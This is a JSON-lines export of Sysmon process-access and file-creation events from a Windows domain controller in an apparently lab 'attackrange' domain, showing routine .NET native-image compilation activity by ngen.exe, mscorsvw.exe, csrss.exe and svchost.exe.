{"EventTime":"2020-08-01 07:01:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7601,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:04.621\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1330-5F25-0000-001038A60B00}\r\nTargetProcessId: 3700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:04.621","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1330-5F25-0000-001038A60B00}","TargetProcessId":"3700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7602,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:04.637\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1330-5F25-0000-001038A60B00}\r\nTargetProcessId: 3700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:04.637","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1330-5F25-0000-001038A60B00}","TargetProcessId":"3700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7603,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:04.637\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1330-5F25-0000-001038A60B00}\r\nTargetProcessId: 3700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:04.637","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1330-5F25-0000-001038A60B00}","TargetProcessId":"3700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7604,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:04.684\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1330-5F25-0000-001098A90B00}\r\nTargetProcessId: 5008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:04.684","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1330-5F25-0000-001098A90B00}","TargetProcessId":"5008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7605,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:04.684\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1330-5F25-0000-001098A90B00}\r\nTargetProcessId: 5008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:04.684","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1330-5F25-0000-001098A90B00}","TargetProcessId":"5008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7606,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:04.700\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1330-5F25-0000-001098A90B00}\r\nTargetProcessId: 5008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:04.700","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1330-5F25-0000-001098A90B00}","TargetProcessId":"5008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7607,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:05.246\r\nProcessGuid: {E2A3D6B1-1330-5F25-0000-001098A90B00}\r\nProcessId: 5008\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1390-0\\Microsoft.Build.Utilities.v4.0.dll\r\nCreationUtcTime: 2020-08-01 07:01:05.246","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:05.246","ProcessGuid":"{E2A3D6B1-1330-5F25-0000-001098A90B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1390-0\\Microsoft.Build.Utilities.v4.0.dll","CreationUtcTime":"2020-08-01 07:01:05.246","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7608,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.293\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-00104EAD0B00}\r\nTargetProcessId: 1528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.293","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-00104EAD0B00}","TargetProcessId":"1528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7609,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.293\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-00104EAD0B00}\r\nTargetProcessId: 1528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 